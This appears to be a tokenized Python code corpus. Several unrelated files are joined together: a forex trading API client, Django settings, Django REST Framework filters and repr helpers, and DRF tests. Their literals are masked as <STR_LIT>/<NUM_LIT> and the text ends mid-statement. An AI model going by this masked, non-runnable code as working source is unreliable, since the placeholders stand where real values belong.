join ( ids ) if ids else None <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_trade ( self , trade_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> trade_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def update_trade ( <EOL> self , <EOL> trade_id , <EOL> stop_loss = None , <EOL> take_profit = None , <EOL> trailing_stop = None <EOL> ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> trade_id <EOL> ) <EOL> params = { <EOL> "<STR_LIT>" : stop_loss , <EOL> "<STR_LIT>" : take_profit , <EOL> "<STR_LIT>" : trailing_stop <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> raise NotImplementedError ( ) <EOL> def close_trade ( self , trade_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> trade_id <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_positions ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> return self . 
_Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_position ( self , instrument ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> instrument <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def close_position ( self , instrument ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> instrument <EOL> ) <EOL> try : <EOL> return self . _Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_transactions ( <EOL> self , <EOL> max_id = None , <EOL> count = None , <EOL> instrument = "<STR_LIT:all>" , <EOL> ids = None <EOL> ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> params = { <EOL> "<STR_LIT>" : int ( max_id ) if max_id and max_id > <NUM_LIT:0> else None , <EOL> "<STR_LIT:count>" : int ( count ) if count and count > <NUM_LIT:0> else None , <EOL> "<STR_LIT>" : instrument , <EOL> "<STR_LIT>" : '<STR_LIT:U+002C>' . join ( ids ) if ids else None <EOL> } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_transaction ( self , transaction_id ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id , <EOL> transaction_id <EOL> ) <EOL> try : <EOL> return self . 
_Client__call ( uri = url , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def request_transaction_history ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( <EOL> self . domain , <EOL> self . API_VERSION , <EOL> self . account_id <EOL> ) <EOL> try : <EOL> resp = self . __get_response ( url ) <EOL> return resp . headers [ '<STR_LIT:location>' ] <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_transaction_history ( self , max_wait = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> url = self . request_transaction_history ( ) <EOL> if not url : <EOL> return False <EOL> ready = False <EOL> start = time ( ) <EOL> delay = <NUM_LIT:0.1> <EOL> while not ready and delay : <EOL> response = requests . head ( url ) <EOL> ready = response . ok <EOL> if not ready : <EOL> sleep ( delay ) <EOL> time_remaining = max_wait - time ( ) + start <EOL> max_delay = max ( <NUM_LIT:0.> , time_remaining - <NUM_LIT> ) <EOL> delay = min ( delay * <NUM_LIT:2> , max_delay ) <EOL> if not ready : <EOL> return False <EOL> response = requests . get ( url ) <EOL> try : <EOL> with ZipFile ( BytesIO ( response . content ) ) as container : <EOL> files = container . namelist ( ) <EOL> if not files : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> history = container . open ( files [ <NUM_LIT:0> ] ) <EOL> raw = history . read ( ) . decode ( '<STR_LIT:ascii>' ) <EOL> except BadZipfile : <EOL> log . error ( '<STR_LIT>' , exc_info = True ) <EOL> return False <EOL> return json . loads ( raw , ** self . json_options ) <EOL> def create_account ( self , currency = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { "<STR_LIT>" : currency } <EOL> try : <EOL> return self . 
_Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False <EOL> def get_accounts ( self , username = None ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" . format ( self . domain , self . API_VERSION ) <EOL> params = { "<STR_LIT:username>" : username } <EOL> try : <EOL> return self . _Client__call ( uri = url , params = params , method = "<STR_LIT>" ) <EOL> except RequestException : <EOL> return False <EOL> except AssertionError : <EOL> return False </s>
<s> JSON = "<STR_LIT>" <EOL> XML = "<STR_LIT>" <EOL> TXT = "<STR_LIT>" <EOL> HTML = "<STR_LIT:html>" <EOL> CSV = "<STR_LIT>" <EOL> RSS = "<STR_LIT>" <EOL> ATOM = "<STR_LIT>" <EOL> MARKDOWN = "<STR_LIT>" <EOL> DEFAULT_FORMAT = JSON <EOL> SUPPORTED_FORMATS = { <EOL> JSON : ( "<STR_LIT:application/json>" , ) , <EOL> XML : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> TXT : ( "<STR_LIT>" , ) , <EOL> HTML : ( "<STR_LIT>" , ) , <EOL> CSV : ( "<STR_LIT>" , ) , <EOL> RSS : ( "<STR_LIT>" , ) , <EOL> ATOM : ( "<STR_LIT>" , ) , <EOL> MARKDOWN : ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> } <EOL> def _supported_mimes ( SUPPORTED_FORMATS ) : <EOL> supported_mimes = { } <EOL> for format , mimes in SUPPORTED_FORMATS . iteritems ( ) : <EOL> for mime in mimes : <EOL> supported_mimes [ mime ] = format <EOL> return supported_mimes <EOL> SUPPORTED_MIMES = _supported_mimes ( SUPPORTED_FORMATS ) <EOL> SUPPORTED_METHODS = ( "<STR_LIT:GET>" , "<STR_LIT>" , "<STR_LIT:POST>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> UNFRIENDLY_ENABLE_FILTER = getattr ( settings , '<STR_LIT>' , True ) <EOL> UNFRIENDLY_SECRET = getattr ( settings , '<STR_LIT>' , <EOL> getattr ( settings , '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:32> ] ) <EOL> if not UNFRIENDLY_SECRET : <EOL> UNFRIENDLY_SECRET = '<STR_LIT>' * <NUM_LIT:8> <EOL> UNFRIENDLY_IV = getattr ( settings , '<STR_LIT>' , <EOL> getattr ( settings , '<STR_LIT>' ) [ <NUM_LIT:0> : <NUM_LIT:16> ] ) <EOL> if not UNFRIENDLY_IV : <EOL> UNFRIENDLY_IV = '<STR_LIT>' * <NUM_LIT:4> <EOL> UNFRIENDLY_ENFORCE_CHECKSUM = getattr ( settings , <EOL> '<STR_LIT>' , True ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import operator <EOL> from functools import reduce <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . db import models <EOL> from django . template import loader <EOL> from django . utils import six <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from rest_framework . compat import ( <EOL> crispy_forms , distinct , django_filters , guardian , template_render <EOL> ) <EOL> from rest_framework . settings import api_settings <EOL> if '<STR_LIT>' in settings . INSTALLED_APPS and crispy_forms and django_filters : <EOL> from crispy_forms . helper import FormHelper <EOL> from crispy_forms . layout import Layout , Submit <EOL> class FilterSet ( django_filters . FilterSet ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FilterSet , self ) . __init__ ( * args , ** kwargs ) <EOL> for field in self . form . fields . values ( ) : <EOL> field . help_text = None <EOL> layout_components = list ( self . form . fields . keys ( ) ) + [ <EOL> Submit ( '<STR_LIT>' , _ ( '<STR_LIT>' ) , css_class = '<STR_LIT>' ) , <EOL> ] <EOL> helper = FormHelper ( ) <EOL> helper . form_method = '<STR_LIT:GET>' <EOL> helper . template_pack = '<STR_LIT>' <EOL> helper . layout = Layout ( * layout_components ) <EOL> self . form . helper = helper <EOL> filter_template = '<STR_LIT>' <EOL> elif django_filters : <EOL> class FilterSet ( django_filters . FilterSet ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FilterSet , self ) . __init__ ( * args , ** kwargs ) <EOL> for field in self . form . fields . values ( ) : <EOL> field . 
help_text = None <EOL> filter_template = '<STR_LIT>' <EOL> else : <EOL> FilterSet = None <EOL> filter_template = None <EOL> class BaseFilterBackend ( object ) : <EOL> """<STR_LIT>""" <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> class DjangoFilterBackend ( BaseFilterBackend ) : <EOL> """<STR_LIT>""" <EOL> default_filter_set = FilterSet <EOL> template = filter_template <EOL> def __init__ ( self ) : <EOL> assert django_filters , '<STR_LIT>' <EOL> def get_filter_class ( self , view , queryset = None ) : <EOL> """<STR_LIT>""" <EOL> filter_class = getattr ( view , '<STR_LIT>' , None ) <EOL> filter_fields = getattr ( view , '<STR_LIT>' , None ) <EOL> if filter_class : <EOL> filter_model = filter_class . Meta . model <EOL> assert issubclass ( queryset . model , filter_model ) , '<STR_LIT>' % ( filter_model , queryset . model ) <EOL> return filter_class <EOL> if filter_fields : <EOL> class AutoFilterSet ( self . default_filter_set ) : <EOL> class Meta : <EOL> model = queryset . model <EOL> fields = filter_fields <EOL> return AutoFilterSet <EOL> return None <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> filter_class = self . get_filter_class ( view , queryset ) <EOL> if filter_class : <EOL> return filter_class ( request . query_params , queryset = queryset ) . qs <EOL> return queryset <EOL> def to_html ( self , request , queryset , view ) : <EOL> filter_class = self . get_filter_class ( view , queryset ) <EOL> if not filter_class : <EOL> return None <EOL> filter_instance = filter_class ( request . query_params , queryset = queryset ) <EOL> context = { <EOL> '<STR_LIT>' : filter_instance <EOL> } <EOL> template = loader . get_template ( self . template ) <EOL> return template_render ( template , context ) <EOL> class SearchFilter ( BaseFilterBackend ) : <EOL> search_param = api_settings . 
SEARCH_PARAM <EOL> template = '<STR_LIT>' <EOL> def get_search_terms ( self , request ) : <EOL> """<STR_LIT>""" <EOL> params = request . query_params . get ( self . search_param , '<STR_LIT>' ) <EOL> return params . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> def construct_search ( self , field_name ) : <EOL> if field_name . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> elif field_name . startswith ( '<STR_LIT:=>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> elif field_name . startswith ( '<STR_LIT:@>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> if field_name . startswith ( '<STR_LIT:$>' ) : <EOL> return "<STR_LIT>" % field_name [ <NUM_LIT:1> : ] <EOL> else : <EOL> return "<STR_LIT>" % field_name <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> search_fields = getattr ( view , '<STR_LIT>' , None ) <EOL> search_terms = self . get_search_terms ( request ) <EOL> if not search_fields or not search_terms : <EOL> return queryset <EOL> orm_lookups = [ <EOL> self . construct_search ( six . text_type ( search_field ) ) <EOL> for search_field in search_fields <EOL> ] <EOL> base = queryset <EOL> for search_term in search_terms : <EOL> queries = [ <EOL> models . Q ( ** { orm_lookup : search_term } ) <EOL> for orm_lookup in orm_lookups <EOL> ] <EOL> queryset = queryset . filter ( reduce ( operator . or_ , queries ) ) <EOL> return distinct ( queryset , base ) <EOL> def to_html ( self , request , queryset , view ) : <EOL> if not getattr ( view , '<STR_LIT>' , None ) : <EOL> return '<STR_LIT>' <EOL> term = self . get_search_terms ( request ) <EOL> term = term [ <NUM_LIT:0> ] if term else '<STR_LIT>' <EOL> context = { <EOL> '<STR_LIT>' : self . search_param , <EOL> '<STR_LIT>' : term <EOL> } <EOL> template = loader . get_template ( self . 
template ) <EOL> return template_render ( template , context ) <EOL> class OrderingFilter ( BaseFilterBackend ) : <EOL> ordering_param = api_settings . ORDERING_PARAM <EOL> ordering_fields = None <EOL> template = '<STR_LIT>' <EOL> def get_ordering ( self , request , queryset , view ) : <EOL> """<STR_LIT>""" <EOL> params = request . query_params . get ( self . ordering_param ) <EOL> if params : <EOL> fields = [ param . strip ( ) for param in params . split ( '<STR_LIT:U+002C>' ) ] <EOL> ordering = self . remove_invalid_fields ( queryset , fields , view ) <EOL> if ordering : <EOL> return ordering <EOL> return self . get_default_ordering ( view ) <EOL> def get_default_ordering ( self , view ) : <EOL> ordering = getattr ( view , '<STR_LIT>' , None ) <EOL> if isinstance ( ordering , six . string_types ) : <EOL> return ( ordering , ) <EOL> return ordering <EOL> def get_valid_fields ( self , queryset , view ) : <EOL> valid_fields = getattr ( view , '<STR_LIT>' , self . ordering_fields ) <EOL> if valid_fields is None : <EOL> serializer_class = getattr ( view , '<STR_LIT>' ) <EOL> if serializer_class is None : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise ImproperlyConfigured ( msg % self . __class__ . __name__ ) <EOL> valid_fields = [ <EOL> ( field . source or field_name , field . label ) <EOL> for field_name , field in serializer_class ( ) . fields . items ( ) <EOL> if not getattr ( field , '<STR_LIT>' , False ) and not field . source == '<STR_LIT:*>' <EOL> ] <EOL> elif valid_fields == '<STR_LIT>' : <EOL> valid_fields = [ <EOL> ( field . name , field . verbose_name ) for field in queryset . model . _meta . fields <EOL> ] <EOL> valid_fields += [ <EOL> ( key , key . title ( ) . split ( '<STR_LIT>' ) ) <EOL> for key in queryset . query . annotations . keys ( ) <EOL> ] <EOL> else : <EOL> valid_fields = [ <EOL> ( item , item ) if isinstance ( item , six . 
string_types ) else item <EOL> for item in valid_fields <EOL> ] <EOL> return valid_fields <EOL> def remove_invalid_fields ( self , queryset , fields , view ) : <EOL> valid_fields = [ item [ <NUM_LIT:0> ] for item in self . get_valid_fields ( queryset , view ) ] <EOL> return [ term for term in fields if term . lstrip ( '<STR_LIT:->' ) in valid_fields ] <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> ordering = self . get_ordering ( request , queryset , view ) <EOL> if ordering : <EOL> return queryset . order_by ( * ordering ) <EOL> return queryset <EOL> def get_template_context ( self , request , queryset , view ) : <EOL> current = self . get_ordering ( request , queryset , view ) <EOL> current = None if current is None else current [ <NUM_LIT:0> ] <EOL> options = [ ] <EOL> for key , label in self . get_valid_fields ( queryset , view ) : <EOL> options . append ( ( key , '<STR_LIT>' % ( label , _ ( '<STR_LIT>' ) ) ) ) <EOL> options . append ( ( '<STR_LIT:->' + key , '<STR_LIT>' % ( label , _ ( '<STR_LIT>' ) ) ) ) <EOL> return { <EOL> '<STR_LIT>' : request , <EOL> '<STR_LIT>' : current , <EOL> '<STR_LIT>' : self . ordering_param , <EOL> '<STR_LIT>' : options , <EOL> } <EOL> def to_html ( self , request , queryset , view ) : <EOL> template = loader . get_template ( self . template ) <EOL> context = self . get_template_context ( request , queryset , view ) <EOL> return template_render ( template , context ) <EOL> class DjangoObjectPermissionsFilter ( BaseFilterBackend ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> assert guardian , '<STR_LIT>' <EOL> perm_format = '<STR_LIT>' <EOL> def filter_queryset ( self , request , queryset , view ) : <EOL> extra = { } <EOL> user = request . user <EOL> model_cls = queryset . model <EOL> kwargs = { <EOL> '<STR_LIT>' : model_cls . _meta . app_label , <EOL> '<STR_LIT>' : model_cls . _meta . model_name <EOL> } <EOL> permission = self . perm_format % kwargs <EOL> if guardian . 
VERSION >= ( <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> extra = { '<STR_LIT>' : False } <EOL> else : <EOL> extra = { } <EOL> return guardian . shortcuts . get_objects_for_user ( user , permission , queryset , ** extra ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import re <EOL> from django . db import models <EOL> from django . utils . encoding import force_text <EOL> from django . utils . functional import Promise <EOL> from rest_framework . compat import unicode_repr <EOL> def manager_repr ( value ) : <EOL> model = value . model <EOL> opts = model . _meta <EOL> for _ , name , manager in opts . concrete_managers + opts . abstract_managers : <EOL> if manager == value : <EOL> return '<STR_LIT>' % ( model . _meta . object_name , name ) <EOL> return repr ( value ) <EOL> def smart_repr ( value ) : <EOL> if isinstance ( value , models . Manager ) : <EOL> return manager_repr ( value ) <EOL> if isinstance ( value , Promise ) and value . _delegate_text : <EOL> value = force_text ( value ) <EOL> value = unicode_repr ( value ) <EOL> if value . startswith ( "<STR_LIT>" ) and value . endswith ( "<STR_LIT:'>" ) : <EOL> return value [ <NUM_LIT:1> : ] <EOL> value = re . sub ( '<STR_LIT>' , '<STR_LIT:>>' , value ) <EOL> return value <EOL> def field_repr ( field , force_many = False ) : <EOL> kwargs = field . _kwargs <EOL> if force_many : <EOL> kwargs = kwargs . copy ( ) <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> arg_string = '<STR_LIT:U+002CU+0020>' . join ( [ smart_repr ( val ) for val in field . _args ] ) <EOL> kwarg_string = '<STR_LIT:U+002CU+0020>' . join ( [ <EOL> '<STR_LIT>' % ( key , smart_repr ( val ) ) <EOL> for key , val in sorted ( kwargs . items ( ) ) <EOL> ] ) <EOL> if arg_string and kwarg_string : <EOL> arg_string += '<STR_LIT:U+002CU+0020>' <EOL> if force_many : <EOL> class_name = force_many . __class__ . __name__ <EOL> else : <EOL> class_name = field . __class__ . 
__name__ <EOL> return "<STR_LIT>" % ( class_name , arg_string , kwarg_string ) <EOL> def serializer_repr ( serializer , indent , force_many = None ) : <EOL> ret = field_repr ( serializer , force_many ) + '<STR_LIT::>' <EOL> indent_str = '<STR_LIT:U+0020>' * indent <EOL> if force_many : <EOL> fields = force_many . fields <EOL> else : <EOL> fields = serializer . fields <EOL> for field_name , field in fields . items ( ) : <EOL> ret += '<STR_LIT:\n>' + indent_str + field_name + '<STR_LIT>' <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> ret += serializer_repr ( field , indent + <NUM_LIT:1> ) <EOL> elif hasattr ( field , '<STR_LIT>' ) : <EOL> ret += list_repr ( field , indent + <NUM_LIT:1> ) <EOL> elif hasattr ( field , '<STR_LIT>' ) : <EOL> ret += field_repr ( field . child_relation , force_many = field . child_relation ) <EOL> else : <EOL> ret += field_repr ( field ) <EOL> if serializer . validators : <EOL> ret += '<STR_LIT:\n>' + indent_str + '<STR_LIT>' <EOL> ret += '<STR_LIT:\n>' + indent_str + '<STR_LIT>' + smart_repr ( serializer . validators ) <EOL> return ret <EOL> def list_repr ( serializer , indent ) : <EOL> child = serializer . child <EOL> if hasattr ( child , '<STR_LIT>' ) : <EOL> return serializer_repr ( serializer , indent , force_many = child ) <EOL> return field_repr ( serializer ) </s>
<s> from django . conf . urls import url <EOL> from django . contrib . auth . models import User <EOL> from rest_framework . authentication import TokenAuthentication <EOL> from rest_framework . authtoken . models import Token <EOL> from rest_framework . test import APITestCase <EOL> from rest_framework . views import APIView <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , APIView . as_view ( authentication_classes = ( TokenAuthentication , ) ) ) , <EOL> ] <EOL> class MyMiddleware ( object ) : <EOL> def process_response ( self , request , response ) : <EOL> assert hasattr ( request , '<STR_LIT:user>' ) , '<STR_LIT>' <EOL> assert request . user . is_authenticated ( ) , '<STR_LIT>' <EOL> return response <EOL> class TestMiddleware ( APITestCase ) : <EOL> urls = '<STR_LIT>' <EOL> def test_middleware_can_access_user_when_processing_response ( self ) : <EOL> user = User . objects . create_user ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> key = '<STR_LIT>' <EOL> Token . objects . create ( key = key , user = user ) <EOL> with self . settings ( <EOL> MIDDLEWARE_CLASSES = ( '<STR_LIT>' , ) <EOL> ) : <EOL> auth = '<STR_LIT>' + key <EOL> self . client . get ( '<STR_LIT:/>' , HTTP_AUTHORIZATION = auth ) </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from django . core . validators import MaxValueValidator , RegexValidator <EOL> from django . db import models <EOL> from django . test import TestCase <EOL> from rest_framework import generics , serializers , status <EOL> from rest_framework . test import APIRequestFactory <EOL> factory = APIRequestFactory ( ) <EOL> class ValidationModel ( models . Model ) : <EOL> blank_validated_field = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class ValidationModelSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = ValidationModel <EOL> fields = ( '<STR_LIT>' , ) <EOL> read_only_fields = ( '<STR_LIT>' , ) <EOL> class UpdateValidationModel ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> queryset = ValidationModel . objects . all ( ) <EOL> serializer_class = ValidationModelSerializer <EOL> class ShouldValidateModel ( models . Model ) : <EOL> should_validate_field = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class ShouldValidateModelSerializer ( serializers . ModelSerializer ) : <EOL> renamed = serializers . CharField ( source = '<STR_LIT>' , required = False ) <EOL> def validate_renamed ( self , value ) : <EOL> if len ( value ) < <NUM_LIT:3> : <EOL> raise serializers . ValidationError ( '<STR_LIT>' ) <EOL> return value <EOL> class Meta : <EOL> model = ShouldValidateModel <EOL> fields = ( '<STR_LIT>' , ) <EOL> class TestNestedValidationError ( TestCase ) : <EOL> def test_nested_validation_error_detail ( self ) : <EOL> """<STR_LIT>""" <EOL> e = serializers . ValidationError ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:error>' ] , <EOL> } <EOL> } ) <EOL> self . assertEqual ( serializers . 
get_validation_error_detail ( e ) , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:error>' ] , <EOL> } <EOL> } ) <EOL> class TestPreSaveValidationExclusionsSerializer ( TestCase ) : <EOL> def test_renamed_fields_are_model_validated ( self ) : <EOL> """<STR_LIT>""" <EOL> serializer = ShouldValidateModelSerializer ( data = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( serializer . is_valid ( ) , False ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) <EOL> self . assertNotIn ( '<STR_LIT>' , serializer . errors ) <EOL> class TestCustomValidationMethods ( TestCase ) : <EOL> def test_custom_validation_method_is_executed ( self ) : <EOL> serializer = ShouldValidateModelSerializer ( data = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) <EOL> def test_custom_validation_method_passing ( self ) : <EOL> serializer = ShouldValidateModelSerializer ( data = { '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> self . assertTrue ( serializer . is_valid ( ) ) <EOL> class ValidationSerializer ( serializers . Serializer ) : <EOL> foo = serializers . CharField ( ) <EOL> def validate_foo ( self , attrs , source ) : <EOL> raise serializers . ValidationError ( "<STR_LIT>" ) <EOL> def validate ( self , attrs ) : <EOL> raise serializers . ValidationError ( "<STR_LIT>" ) <EOL> class TestAvoidValidation ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_serializer_errors_has_only_invalid_data_error ( self ) : <EOL> serializer = ValidationSerializer ( data = '<STR_LIT>' ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertDictEqual ( serializer . errors , { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' % type ( '<STR_LIT>' ) . __name__ <EOL> ] <EOL> } ) <EOL> class ValidationMaxValueValidatorModel ( models . Model ) : <EOL> number_value = models . 
PositiveIntegerField ( validators = [ MaxValueValidator ( <NUM_LIT:100> ) ] ) <EOL> class ValidationMaxValueValidatorModelSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = ValidationMaxValueValidatorModel <EOL> class UpdateMaxValueValidationModel ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> queryset = ValidationMaxValueValidatorModel . objects . all ( ) <EOL> serializer_class = ValidationMaxValueValidatorModelSerializer <EOL> class TestMaxValueValidatorValidation ( TestCase ) : <EOL> def test_max_value_validation_serializer_success ( self ) : <EOL> serializer = ValidationMaxValueValidatorModelSerializer ( data = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertTrue ( serializer . is_valid ( ) ) <EOL> def test_max_value_validation_serializer_fails ( self ) : <EOL> serializer = ValidationMaxValueValidatorModelSerializer ( data = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertDictEqual ( { '<STR_LIT>' : [ '<STR_LIT>' ] } , serializer . errors ) <EOL> def test_max_value_validation_success ( self ) : <EOL> obj = ValidationMaxValueValidatorModel . objects . create ( number_value = <NUM_LIT:100> ) <EOL> request = factory . patch ( '<STR_LIT>' . format ( obj . pk ) , { '<STR_LIT>' : <NUM_LIT> } , format = '<STR_LIT>' ) <EOL> view = UpdateMaxValueValidationModel ( ) . as_view ( ) <EOL> response = view ( request , pk = obj . pk ) . render ( ) <EOL> self . assertEqual ( response . status_code , status . HTTP_200_OK ) <EOL> def test_max_value_validation_fail ( self ) : <EOL> obj = ValidationMaxValueValidatorModel . objects . create ( number_value = <NUM_LIT:100> ) <EOL> request = factory . patch ( '<STR_LIT>' . format ( obj . pk ) , { '<STR_LIT>' : <NUM_LIT> } , format = '<STR_LIT>' ) <EOL> view = UpdateMaxValueValidationModel ( ) . as_view ( ) <EOL> response = view ( request , pk = obj . pk ) . render ( ) <EOL> self . assertEqual ( response . content , b'<STR_LIT>' ) <EOL> self . 
assertEqual ( response . status_code , status . HTTP_400_BAD_REQUEST ) <EOL> class TestChoiceFieldChoicesValidate ( TestCase ) : <EOL> CHOICES = [ <EOL> ( <NUM_LIT:0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ] <EOL> SINGLE_CHOICES = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> CHOICES_NESTED = [ <EOL> ( '<STR_LIT>' , ( <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:3> , '<STR_LIT>' ) , <EOL> ) ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' ) , <EOL> ] <EOL> MIXED_CHOICES = [ <EOL> ( '<STR_LIT>' , ( <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ) ) , <EOL> <NUM_LIT:3> , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' ) , <EOL> ] <EOL> def test_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . CHOICES ) <EOL> value = self . CHOICES [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> def test_single_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . SINGLE_CHOICES ) <EOL> value = self . SINGLE_CHOICES [ <NUM_LIT:0> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> def test_nested_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . CHOICES_NESTED ) <EOL> value = self . CHOICES_NESTED [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> try : <EOL> f . to_internal_value ( value ) <EOL> except serializers . ValidationError : <EOL> self . fail ( "<STR_LIT>" % str ( value ) ) <EOL> def test_mixed_choices ( self ) : <EOL> """<STR_LIT>""" <EOL> f = serializers . ChoiceField ( choices = self . MIXED_CHOICES ) <EOL> value = self . 
